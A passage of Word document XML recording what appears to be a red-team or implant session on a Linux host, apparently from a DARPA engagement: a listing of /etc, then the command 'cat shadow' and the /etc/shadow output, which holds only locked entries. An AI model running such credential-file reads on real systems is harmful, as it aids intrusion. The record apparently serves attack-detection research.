        <w:t>[*] drwxr-xr-x root  root    4096   pulse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7FF2A0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   purple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238B92CF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8BC8E5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   python2.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A6CDC9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3174A1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   python3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575431CF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rwxr-xr-x root  root    306    rc.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5407ACA3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   rc0.d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4576CC45" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   rc1.d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798751D9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   rc2.d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575BE96B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   rc3.d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1683CF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   rc4.d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CBA985" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   rc5.d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E32F69B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   rc6.d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142B875B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   rcS.d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F468E0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] lrwxrwxrwx root  root    29     resolv.conf -&gt; ./../run/resolvconf/resolv.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6849C5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   resolvconf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE2CFBA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rwxr-xr-x root  root    268    rmt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E47DF25" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    887    rpc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364880B5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    1320   rsyslog.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167E79AC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   rsyslog.d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0E6DC4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   salt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D95A71B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   samba</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7138ABC5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   sane.d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2622933D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    3663   screenrc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17774994" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    4038   securetty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564E7201" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7875E5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   selinux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4F8A64" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   sensors.d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787CDAA4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    10344  sensors3.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DCCE3F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    19558  services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E12CB6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   sgml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7D3C8D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r----- root  shadow  1851   shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3588BF92" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw------- root  root    1851   shadow-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2A0F6A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    103    shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9E4B5F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    1803   signond.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BE4AA3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   skel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304221DD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   speech-dispatcher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7419DC2C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F20695D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   ssl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3976E57C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    132    subgid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214E9194" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw------- root  root    113    subgid-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3391D6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    132    subuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6EABFC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw------- root  root    113    subuid-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC8DC4E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -r--r----- root  root    745    sudoers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B87C9F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   sudoers.d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B91A2E6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    2084   sysctl.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2321CD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   sysctl.d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D4A3EB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   systemd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A13E2C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -r--r--r-- darpa darpa   150    tc-version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDAE29E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   terminfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1734AFED" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   thunderbird</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4DD98F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    11     timezone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A02135" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    1260   ucf.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E26DB6D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   udev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BCB106" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   udisks2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E01783" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   ufw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F2B863" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   update-manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55985F7E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   update-motd.d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51944116" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   update-notifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F91BA71" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    321    updatedb.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AA4589" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    222    upstart-xsessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233A735C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    888    usb_modeswitch.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14685B0E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   usb_modeswitch.d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0279D845" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   vim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176A7AAD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] lrwxrwxrwx root  root    23     vtrgb -&gt; /etc/alternatives/vtrgb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF10DBF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   w3m</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA9537F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    4812   wgetrc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F4F365" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   wpa_supplicant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2A55BD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   xdg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79280AA6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   xfce4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102D7E17" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4AEE87" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    349    zsh_command_not_found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AD9766" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B95DC2E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:43</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2C860F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L2&gt;cat shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1FD3E0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] root:!:17960:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42101DD4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>daemon:*:17016:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F55259A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>bin:*:17016:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0090921D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sys:*:17016:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45421E1A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sync:*:17016:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1489B4CC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>games:*:17016:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E9C3E4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>man:*:17016:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000CA3C6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>lp:*:17016:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF3A145" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>mail:*:17016:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407EC9B3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>news:*:17016:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0CA7AD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>uucp:*:17016:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8974E9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>proxy:*:17016:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2756D90D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>www-data:*:17016:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D1895C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>backup:*:17016:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068F6CC3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>list:*:17016:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474C1C41" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>irc:*:17016:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE4B1EB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>gnats:*:17016:0:99999:7:::</w:t>
      </w:r>
    </w:p>
